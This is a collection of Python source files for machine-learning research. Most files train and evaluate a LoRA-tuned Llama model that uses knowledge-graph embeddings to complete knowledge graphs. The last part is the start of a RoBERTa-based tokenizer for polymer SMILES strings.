lora_alpha: float = field(default=16, metadata={"help": " Lora alpha."})
lora_dropout: float = field(default=0.0, metadata={"help":"Lora dropout."})
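    # The three LoRA fields above are passed to peft.LoraConfig inside utils.get_accelerate_model().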
report_to: str = field(default='none', metadata={'help': "do not use any loggers"})
remove_unused_columns: bool = field(default=False, metadata={"help": 'Removed unused columns. Needed to make this codebase work.'})
@dataclass
class EvaluationArguments:
checkpoint_dir: Optional[str] = field(default=None)
full_finetune: bool = field(default=False, metadata={"help": "Finetune the entire model without adapters."})
@dataclass
class GenerationArguments:
# control the length of the output
max_new_tokens: Optional[int] = field(default=64)
min_new_tokens : Optional[int] = field(default=1)
# Generation strategy
do_sample: Optional[bool] = field(default=True)
num_beams: Optional[int] = field(default=1)
num_beam_groups: Optional[int] = field(default=1)
penalty_alpha: Optional[float] = field(default=None)
use_cache: Optional[bool] = field(default=True)
# Hyperparameters for logit manipulation
temperature: Optional[float] = field(default=1.0)
top_k: Optional[int] = field(default=50)
top_p: Optional[float] = field(default=0.9)
typical_p: Optional[float] = field(default=1.0)
diversity_penalty: Optional[float] = field(default=0.0)
repetition_penalty: Optional[float] = field(default=1.0)
length_penalty: Optional[float] = field(default=1.0)
no_repeat_ngram_size: Optional[int] = field(default=0)
num_return_sequences: Optional[int] = field(default=1)
output_scores: Optional[bool] = field(default=False)
return_dict_in_generate: Optional[bool] = field(default=True)
| 4,907 | Python | .py | 78 | 57.820513 | 147 | 0.706742 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,122 | eval.py | nju-websoft_DIFT/eval.py | import os
import json
import copy
import numpy as np
from time import time
from tqdm import trange, tqdm
import argparse
import pickle as pkl
from typing import Union, Dict
import torch
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
from transformers import (
HfArgumentParser, GenerationConfig, AutoConfig,
AutoTokenizer,
AutoModelForCausalLM, LlamaForCausalLM,
set_seed,
)
from peft.tuners.lora import LoraLayer
from peft import LoraConfig, get_peft_model, PeftModel, prepare_model_for_kbit_training
from arguments import ModelArguments, DataArguments, EvaluationArguments, GenerationArguments
from data import DataModule, KGDataset, KGDataCollator, IGNORE_INDEX
from utils import get_logger, print_parameter_datatypes, print_trainable_parameters
from model import EmbeddingModel, KGELlama
class Evaluator:
def __init__(
self,
args,
tokenizer: AutoTokenizer,
model: Union[AutoModelForCausalLM, PeftModel, KGELlama],
data_module: DataModule,
generation_config: GenerationConfig,
) -> None:
self.args = args
self.sample_size = 200
self.generation_config = generation_config
self.tokenizer = tokenizer
self.model = model
self.data_module = data_module
self.data_collator = KGDataCollator(args, tokenizer, args.source_max_len, args.target_max_len)
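    # Greedy-decoding evaluation: the LLM predicts one entity name per test query, which is used
    # to re-rank the KGE candidate list. A correct prediction moves the gold entity to rank 1; a
    # wrong prediction pushes the gold rank down by one unless the predicted name already sat
    # above the gold entity among the candidates.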
@torch.no_grad()
def eval_greedy(self, dataset: KGDataset):
# self.tokenizer.padding_side = 'left'
self.model.eval()
preds = []
raw_ranks = np.array([])
ranks = np.array([])
print_step = 1000
data_num = len(dataset)
for begin_idx in range(0, data_num, print_step):
end_idx = min(begin_idx + print_step, data_num)
generated = []
for ex_idx, ex in enumerate(tqdm(dataset[begin_idx: end_idx])):
prompt = ex['input']
if self.args.model_class == 'LlamaForCausalLM':
inputs = self.tokenizer(prompt, return_tensors='pt')
input_ids = inputs.input_ids.cuda() # (1, input_len)
input_len = input_ids.shape[-1]
output = self.model.generate(input_ids=input_ids, generation_config=self.generation_config)
generated.append(output.sequences[0, input_len:].cpu().numpy().tolist())
if self.args.model_class == 'KGELlama':
inputs = self.tokenizer(prompt, return_tensors='pt')
input_ids = inputs.input_ids.cuda() # (1, input_len)
output = self.model.generate(
input_ids=input_ids,
query_ids=torch.LongTensor([ex['query_id']]).to(input_ids.device),
entity_ids=torch.LongTensor([ex['entity_ids']]).to(input_ids.device),
generation_config=self.generation_config,
)
generated.append(output.sequences[0].cpu().numpy().tolist())
ex.pop('input')
batch_preds = self.tokenizer.batch_decode(generated, skip_special_tokens=True)
for ex_idx, ex in enumerate(dataset[begin_idx: end_idx]):
target = ex.pop('output')
rank = ex['rank']
pred = str(batch_preds[ex_idx]).strip()
topk_names = ex['topk_names']
if target == pred:
rank = 1
else:
if pred not in set(topk_names) or topk_names.index(pred) >= rank:
rank += 1
ex['target'] = target
ex['pred_rank'] = rank
ex['pred'] = pred
preds.append(ex)
raw_ranks = np.append(raw_ranks, ex['rank'])
ranks = np.append(ranks, rank)
def compute_metrics(ranks_: np.ndarray):
metrics = {
'hits1': np.mean(ranks_ <= 1),
'hits3': np.mean(ranks_ <= 3),
'hits10': np.mean(ranks_ <= 10),
'mrr': np.mean(1. / ranks_),
}
metrics = {k: round(v, 3) for k, v in metrics.items()}
logger.info(f'num: {ranks_.shape[0]}; {metrics}')
logger.info('='*80)
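        # Report metrics for the original KGE ranking first, then for the LLM re-ranked results.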
compute_metrics(raw_ranks)
compute_metrics(ranks)
return preds
if __name__ == '__main__':
set_seed(2023)
# load args
hfparser = HfArgumentParser((ModelArguments, DataArguments, EvaluationArguments, GenerationArguments))
model_args, data_args, eval_args, generation_args, _ = hfparser.parse_args_into_dataclasses(return_remaining_strings=True)
generation_config = GenerationConfig(**vars(generation_args))
args = argparse.Namespace(**vars(model_args), **vars(data_args), **vars(eval_args))
assert args.model_class in ['LlamaForCausalLM', 'KGELlama']
if args.kge_model == 'TransE':
args.embedding_dim = 100
# checkpoint_dir: .../checkpoint-xxxx/adapter_model
logger = get_logger(os.path.dirname(args.checkpoint_dir))
logger.info('args=>')
logger.info(json.dumps(vars(args), ensure_ascii=False, indent=4))
# tokenizer
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=False)
tokenizer.pad_token = tokenizer.eos_token
if args.model_class == 'KGELlama':
tokenizer.add_tokens(['[QUERY]', '[ENTITY]', '[RELATION]'])
if args.model_class == 'LlamaForCausalLM':
model = LlamaForCausalLM.from_pretrained(args.model_name_or_path, low_cpu_mem_usage=True, device_map='auto')
model = PeftModel.from_pretrained(model, args.checkpoint_dir)
if args.model_class == 'KGELlama':
generation_config.bos_token_id = tokenizer.bos_token_id
model = LlamaForCausalLM.from_pretrained(args.model_name_or_path, low_cpu_mem_usage=True, device_map='auto')
model = PeftModel.from_pretrained(model, args.checkpoint_dir)
llm_config = model.config
kge_embedding_dir = os.path.join(args.dataset, args.kge_model)
embed_model = EmbeddingModel(kge_embedding_dir, args.embedding_dim, 1024, llm_config.hidden_size, llm_config.hidden_act)
embed_model.load_state_dict(torch.load(os.path.join(os.path.dirname(args.checkpoint_dir), 'kge.bin'), map_location='cpu'))
model = KGELlama(tokenizer, model, embed_model)
model.cuda()
model.eval()
print_parameter_datatypes(model, logger)
# data
data_module = DataModule(args, tokenizer)
# inference
evaluator = Evaluator(args, tokenizer, model, data_module, generation_config)
preds = evaluator.eval_greedy(data_module.test_ds)
output = {
'args': vars(args),
'generation_config': vars(generation_config),
'prediction': preds,
}
    output_path = os.path.join(os.path.dirname(args.checkpoint_dir), 'prediction.json')
json.dump(output, open(output_path, 'w', encoding='utf-8'), ensure_ascii=False, indent=4)
| 7,211 | Python | .py | 147 | 38.108844 | 130 | 0.619589 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,123 | utils.py | nju-websoft_DIFT/utils.py | from genericpath import isfile
import os
import json
import copy
import tqdm
import logging
import pandas as pd
import argparse
from typing import List, Optional, Dict, Sequence, Union
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
import transformers
from transformers import (
AutoConfig, GenerationConfig,
AutoTokenizer, PreTrainedTokenizer,
AutoModelForCausalLM,
Seq2SeqTrainingArguments, Seq2SeqTrainer, HfArgumentParser,
set_seed,
Seq2SeqTrainer,
BitsAndBytesConfig,
LlamaTokenizer
)
from peft.tuners.lora import LoraLayer
from peft import LoraConfig, get_peft_model, PeftModelForCausalLM, prepare_model_for_kbit_training
from model import KGELlama
def find_all_linear_names(args, model):
if args.use_quant:
cls = bnb.nn.Linear4bit if args.bits == 4 else (bnb.nn.Linear8bitLt if args.bits == 8 else torch.nn.Linear)
else:
cls = torch.nn.Linear
lora_module_names = set()
for name, module in model.named_modules():
if isinstance(module, cls):
names = name.split('.')
lora_module_names.add(names[0] if len(names) == 1 else names[-1])
if 'lm_head' in lora_module_names: # needed for 16-bit
lora_module_names.remove('lm_head')
return list(lora_module_names)
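# Build the (optionally k-bit quantized) base model and, unless full_finetune is set, wrap it in
# LoRA adapters. The device map is chosen per process so the same code also works when launched
# with torchrun/accelerate.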
def get_accelerate_model(args, config, pretrained_model_class):
# if we are in a distributed setting, we need to set the device map and max memory per device
device_map = 'auto' if os.environ.get('LOCAL_RANK') is None else {'': int(os.environ.get('LOCAL_RANK', '0'))}
print(f'Loading base model {args.model_name_or_path}...')
if args.use_quant:
compute_dtype = (torch.float16 if args.fp16 else (torch.bfloat16 if args.bf16 else torch.float32))
model = pretrained_model_class.from_pretrained(
args.model_name_or_path,
config=config,
load_in_4bit=args.bits == 4,
load_in_8bit=args.bits == 8,
device_map='auto',
quantization_config=BitsAndBytesConfig(
load_in_4bit=args.bits == 4,
load_in_8bit=args.bits == 8,
llm_int8_threshold=6.0,
llm_int8_has_fp16_weight=False,
bnb_4bit_compute_dtype=compute_dtype,
bnb_4bit_use_double_quant=args.double_quant,
bnb_4bit_quant_type=args.quant_type,
),
torch_dtype=(torch.float16 if args.fp16 else (torch.bfloat16 if args.bf16 else torch.float32)),
)
else:
model = pretrained_model_class.from_pretrained(
args.model_name_or_path,
config=config,
low_cpu_mem_usage=True,
device_map=device_map,
)
setattr(model, 'model_parallel', True)
setattr(model, 'is_parallelizable', True)
if not args.full_finetune:
model = prepare_model_for_kbit_training(model, use_gradient_checkpointing=args.use_quant)
print(f'Adding LoRA modules...')
config = LoraConfig(
r=args.lora_r,
lora_alpha=args.lora_alpha,
lora_dropout=args.lora_dropout,
bias="none",
task_type="CAUSAL_LM",
)
model = get_peft_model(model, config)
for name, module in model.named_modules():
if isinstance(module, LoraLayer):
if args.bf16:
module = module.to(torch.bfloat16)
if 'norm' in name:
module = module.to(torch.float32)
if 'lm_head' in name or 'embed_tokens' in name:
if hasattr(module, 'weight'):
if args.bf16 and module.weight.dtype == torch.float32:
module = module.to(torch.bfloat16)
return model
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
print('Saving PEFT checkpoint...')
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "adapter_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"checkpoint-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "adapter_model")
kwargs["model"].save_pretrained(peft_model_path)
for file_name in os.listdir(checkpoint_folder):
if 'kge' in file_name:
continue
file_path = os.path.join(checkpoint_folder, file_name)
if os.path.isfile(file_path):
os.remove(file_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
def on_train_end(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
def print_trainable_parameters(args, model, logger=None):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_params = 0
for _, param in model.named_parameters():
all_params += param.numel()
if param.requires_grad:
trainable_params += param.numel()
if args.use_quant and args.bits == 4: trainable_params /= 2
trainable = round(100 * trainable_params / all_params, 3)
trainable_params = trainable_params//10**6
all_params = all_params//10**9
if logger is None:
print(f"trainable params: {trainable_params}MB || all params: {all_params}GB || trainable: {trainable}%")
else:
logger.info(f"trainable params: {trainable_params}MB || all params: {all_params}GB || trainable: {trainable}%")
def print_parameter_datatypes(model, logger=None):
dtypes = dict()
for _, p in model.named_parameters():
dtype = p.dtype
if dtype not in dtypes: dtypes[dtype] = 0
dtypes[dtype] += p.numel()
total = 0
for k, v in dtypes.items(): total += v
for k, v in dtypes.items():
if logger is None:
print(f'type: {k} || num: {v} || {round(v/total, 3)}')
else:
logger.info(f'type: {k} || num: {v} || {round(v/total, 3)}')
def get_logger(log_dir: str):
log_format = logging.Formatter("[%(asctime)s %(levelname)s] %(message)s")
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file = os.path.join(log_dir, 'log.txt')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(log_format)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_format)
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger | 6,680 | Python | .py | 157 | 34.515924 | 119 | 0.648557 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,124 | train.py | nju-websoft_DIFT/train.py | import os
import json
import copy
import tqdm
import pandas as pd
import argparse
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
from torch.nn.utils.rnn import pad_sequence
from datasets import load_dataset, Dataset
import transformers
from transformers import AutoConfig, GenerationConfig
from transformers import AutoTokenizer, PreTrainedTokenizer
from transformers import AutoModelForCausalLM, LlamaForCausalLM
from transformers import Seq2SeqTrainingArguments, Seq2SeqTrainer, HfArgumentParser
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
from transformers import (
set_seed,
Seq2SeqTrainer,
)
from arguments import ModelArguments, DataArguments, TrainingArguments, GenerationArguments
from data import DataModule, make_data_module
from model import EmbeddingModel, KGELlama
from utils import SavePeftModelCallback, print_trainable_parameters, print_parameter_datatypes, get_logger, get_accelerate_model
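# Illustrative launch command (paths and dataset names below are placeholders, not shipped defaults):
#   python train.py --dataset data/FB15k237 --kge_model CoLE --model_class KGELlama \
#       --model_name_or_path llama-2-7b-chat-hf --train_path data/FB15k237/train.json \
#       --eval_path data/FB15k237/valid.json --test_path data/FB15k237/test.json --output_dir ./output/run1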
def train():
hfparser = HfArgumentParser((ModelArguments, DataArguments, TrainingArguments, GenerationArguments))
model_args, data_args, training_args, generation_args, _ = hfparser.parse_args_into_dataclasses(return_remaining_strings=True)
training_args.generation_config = GenerationConfig(**vars(generation_args))
args = argparse.Namespace(**vars(model_args), **vars(data_args), **vars(training_args))
assert args.model_class in ['LlamaForCausalLM', 'KGELlama']
if args.kge_model == 'TransE':
args.embedding_dim = 100
set_seed(args.seed)
os.makedirs(args.output_dir)
logger = get_logger(args.output_dir)
logger.info(vars(args))
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, use_fast=False)
tokenizer.pad_token = tokenizer.eos_token
if args.model_class == 'KGELlama':
tokenizer.add_tokens(['[QUERY]', '[ENTITY]', '[RELATION]'])
model_config = AutoConfig.from_pretrained(args.model_name_or_path)
model = get_accelerate_model(args, model_config, LlamaForCausalLM)
model.config.use_cache = False
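    # The generation KV cache is not needed during training and conflicts with gradient
    # checkpointing (enabled by prepare_model_for_kbit_training when quantization is used).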
if args.model_class == 'KGELlama':
llm_config = model.config
kge_embedding_dir = os.path.join(args.dataset, args.kge_model)
embed_model = EmbeddingModel(kge_embedding_dir, args.embedding_dim, 1024, llm_config.hidden_size, llm_config.hidden_act)
model = KGELlama(tokenizer, model, embed_model)
# Verifying the datatypes and parameter counts before training.
print_trainable_parameters(args, model, logger)
print_parameter_datatypes(model, logger)
data_module = make_data_module(args, tokenizer, logger)
trainer = Seq2SeqTrainer(
model=model,
tokenizer=tokenizer,
args=training_args,
**data_module,
)
if not args.full_finetune:
trainer.add_callback(SavePeftModelCallback)
# Training
if args.do_train:
train_result = trainer.train()
metrics = train_result.metrics
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
if __name__ == '__main__':
train()
| 3,204 | Python | .py | 71 | 40.197183 | 130 | 0.754997 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,125 | model.py | nju-websoft_DIFT/model.py | import os
from typing import List, Optional, Dict, Sequence, Union
import torch
from torch import nn
from transformers import AutoTokenizer, LlamaForCausalLM, GenerationConfig
from transformers.activations import ACT2FN
from peft import PeftModel
class EmbeddingModel(nn.Module):
def __init__(
self,
embedding_dir: str,
input_size: int,
intermediate_size: int = 1024,
output_size: int = 4096,
hidden_act: str = 'silu',
) -> None:
super().__init__()
entity_embedding_path = os.path.join(embedding_dir, 'entity_embeddings.pt')
query_embedding_path = os.path.join(embedding_dir, 'query_embeddings.pt')
entity_embeddings = torch.load(entity_embedding_path)
entity_embeddings.requires_grad = False
self.ent_embeddings = nn.Embedding.from_pretrained(entity_embeddings)
query_embeddings = torch.load(query_embedding_path)
query_embeddings.requires_grad = False
self.query_embeddings = nn.Embedding.from_pretrained(query_embeddings)
self.adapter = nn.Sequential(
nn.Linear(in_features=input_size, out_features=intermediate_size, bias=False),
ACT2FN[hidden_act],
nn.Linear(in_features=intermediate_size, out_features=output_size, bias=False),
)
for layer in self.adapter:
if isinstance(layer, nn.Linear):
torch.nn.init.xavier_uniform_(layer.weight)
# torch.nn.init.xavier_normal_(layer.weight)
def forward(self, query_ids, entity_ids):
"""
Args:
query_ids: (batch_size, )
entity_ids: (batch_size * K, )
Returns:
query_embeds: (batch_size, hidden_size)
entity_embeds: (batch_size * K, hidden_size)
"""
query_embeds = self.adapter(self.query_embeddings(query_ids))
entity_embeds = self.adapter(self.ent_embeddings(entity_ids))
return query_embeds, entity_embeds
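# KGELlama injects the structural KGE signal into the LLM: the prompt contains [QUERY]/[ENTITY]
# placeholder tokens whose input embeddings are overwritten with the adapter-projected KGE vectors
# before calling the (PEFT-wrapped) Llama model's forward/generate.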
class KGELlama(nn.Module):
def __init__(
self,
tokenizer: AutoTokenizer,
llama_model: Union[LlamaForCausalLM, PeftModel],
kge_model: EmbeddingModel,
):
super().__init__()
self.tokenizer = tokenizer
self.llama_model = llama_model
self.kge_model = kge_model
def forward(
self,
input_ids: torch.LongTensor = None,
attention_mask: Optional[torch.Tensor] = None,
labels: Optional[torch.LongTensor] = None,
query_ids: Optional[torch.LongTensor] = None,
entity_ids: Optional[torch.LongTensor] = None,
):
"""
Args:
input_ids: (batch_size, seq_len)
attention_mask: (batch_size, seq_len)
labels: (batch_size, seq_len)
query_ids: (batch_size, )
entity_ids: (batch_size, K)
"""
query_holder = self.tokenizer.convert_tokens_to_ids(['[QUERY]'])[0]
entity_holder = self.tokenizer.convert_tokens_to_ids(['[ENTITY]'])[0]
query_position = torch.nonzero(input_ids == query_holder) # (batch_size, 2)
entity_position = torch.nonzero(input_ids == entity_holder) # (batch_size*K, 2)
query_embeds, entity_embeds = self.kge_model(query_ids, entity_ids.view(-1))
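        # Placeholders are replaced with the pad id so embed_tokens() yields valid rows, which are
        # then overwritten in-place with the projected query/entity embeddings.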
input_ids[input_ids == query_holder] = self.tokenizer.pad_token_id
input_ids[input_ids == entity_holder] = self.tokenizer.pad_token_id
inputs_embeds = self.llama_model.model.model.embed_tokens(input_ids).clone()
inputs_embeds[query_position[:, 0], query_position[:, 1]] = query_embeds
inputs_embeds[entity_position[:, 0], entity_position[:, 1]] = entity_embeds
return self.llama_model(
inputs_embeds=inputs_embeds,
attention_mask=attention_mask,
labels=labels,
)
def save_pretrained(self, peft_model_path):
self.llama_model.save_pretrained(peft_model_path)
torch.save(self.kge_model.state_dict(), os.path.join(os.path.dirname(peft_model_path), 'kge.bin'))
def generate(
self,
input_ids: torch.LongTensor,
query_ids: torch.LongTensor,
entity_ids: torch.LongTensor,
generation_config: GenerationConfig
):
query_holder = self.tokenizer.convert_tokens_to_ids(['[QUERY]'])[0]
entity_holder = self.tokenizer.convert_tokens_to_ids(['[ENTITY]'])[0]
query_position = torch.nonzero(input_ids == query_holder) # (batch_size, 2)
entity_position = torch.nonzero(input_ids == entity_holder) # (batch_size*K, 2)
query_embeds, entity_embeds = self.kge_model(query_ids, entity_ids.view(-1))
input_ids[input_ids == query_holder] = self.tokenizer.pad_token_id
input_ids[input_ids == entity_holder] = self.tokenizer.pad_token_id
inputs_embeds = self.llama_model.model.model.embed_tokens(input_ids).clone()
inputs_embeds[query_position[:, 0], query_position[:, 1]] = query_embeds
inputs_embeds[entity_position[:, 0], entity_position[:, 1]] = entity_embeds
return self.llama_model.generate(
inputs_embeds=inputs_embeds,
generation_config=generation_config,
) | 5,283 | Python | .py | 112 | 37.633929 | 106 | 0.635476 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,126 | data.py | nju-websoft_DIFT/data.py | import os
import json
import copy
import random
import pandas as pd
from queue import Queue
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
import bitsandbytes as bnb
import torch
from torch.nn.utils.rnn import pad_sequence
# from torch.utils.data import Dataset, DataLoader
from datasets import load_dataset, Dataset
import transformers
IGNORE_INDEX = -100
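# -100 is the default ignore_index of torch.nn.CrossEntropyLoss, so label positions set to it
# (the prompt tokens) are excluded from the language-modeling loss.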
class KGDataset(torch.utils.data.Dataset):
def __init__(self, examples):
self.data = examples
self.len = len(self.data)
def __len__(self):
return self.len
def __getitem__(self, idx) -> List:
return self.data[idx]
class DataModule:
def __init__(self, args, tokenizer: transformers.PreTrainedTokenizer, logger=None) -> None:
self.args = args
self.tokenizer = tokenizer
train_examples = json.load(open(args.train_path, 'r', encoding='utf-8'))
eval_examples = json.load(open(args.eval_path, 'r', encoding='utf-8'))
test_examples = json.load(open(args.test_path, 'r', encoding='utf-8'))
self.train_ds = KGDataset(train_examples)
self.eval_ds = KGDataset(eval_examples)
self.test_ds = KGDataset(test_examples)
@dataclass
class KGDataCollator:
args: None
tokenizer: transformers.PreTrainedTokenizer
source_max_len: int
target_max_len: int
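    # Concatenates each prompt with its answer into one causal-LM sequence and masks the prompt
    # part of the labels with IGNORE_INDEX so that only answer tokens are supervised.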
def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:
# Extract elements
sources = [f"{self.tokenizer.bos_token} {example['input']}" for example in instances]
targets = [f"{example['output']} {self.tokenizer.eos_token}" for example in instances]
# Tokenize
tokenized_sources_with_prompt = self.tokenizer(
sources,
max_length=self.source_max_len,
truncation=True,
add_special_tokens=False,
)
tokenized_targets = self.tokenizer(
targets,
max_length=self.target_max_len,
truncation=True,
add_special_tokens=False,
)
source_input_ids = tokenized_sources_with_prompt['input_ids']
target_input_ids = tokenized_targets['input_ids']
# Build the input and labels for causal LM
input_ids = []
labels = []
for tokenized_source, tokenized_target in zip(source_input_ids, target_input_ids):
input_ids.append(
torch.tensor(tokenized_source + tokenized_target)
)
labels.append(
torch.tensor([IGNORE_INDEX for _ in range(len(tokenized_source))] + copy.deepcopy(tokenized_target))
)
# Apply padding
input_ids = pad_sequence(input_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
labels = pad_sequence(labels, batch_first=True, padding_value=IGNORE_INDEX)
data_dict = {
'input_ids': input_ids,
'attention_mask':input_ids.ne(self.tokenizer.pad_token_id),
'labels': labels,
}
# Add entity idxs to access the KGE model
if self.args.model_class == 'KGELlama':
data_dict['query_ids'] = torch.LongTensor([example['query_id'] for example in instances])
data_dict['entity_ids'] = torch.LongTensor(
[example['entity_ids'] for example in instances]
)
return data_dict
def make_data_module(args, tokenizer: transformers.PreTrainedTokenizer, logger=None) -> Dict:
data_module = DataModule(args, tokenizer, logger)
data_collator = KGDataCollator(
args=args, tokenizer=tokenizer,
source_max_len=args.source_max_len, target_max_len=args.target_max_len
)
return {
'train_dataset': data_module.train_ds,
'eval_dataset': data_module.eval_ds,
'data_collator': data_collator,
}
| 3,878 | Python | .py | 94 | 33.148936 | 116 | 0.65004 | nju-websoft/DIFT | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,127 | get_prediction_results.py | FanmengWang_MMPolymer/get_prediction_results.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
    Returns a list of utf-8 bytes and a mapping to unicode strings. We specifically avoid mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
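# Illustrative note (added): bytes_to_unicode() gives every byte 0-255 a printable unicode
# stand-in, e.g. the space byte 0x20 becomes 'Ġ' (U+0120), so byte-level BPE never has to
# handle raw whitespace or control characters directly.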
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
            The beginning of sequence token that was used during pretraining. Can be used as a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
            Whether or not to add an initial space to the input. This allows treating the leading word just as any
            other word. (The RoBERTa tokenizer detects the beginning of words by the preceding space.)
"""
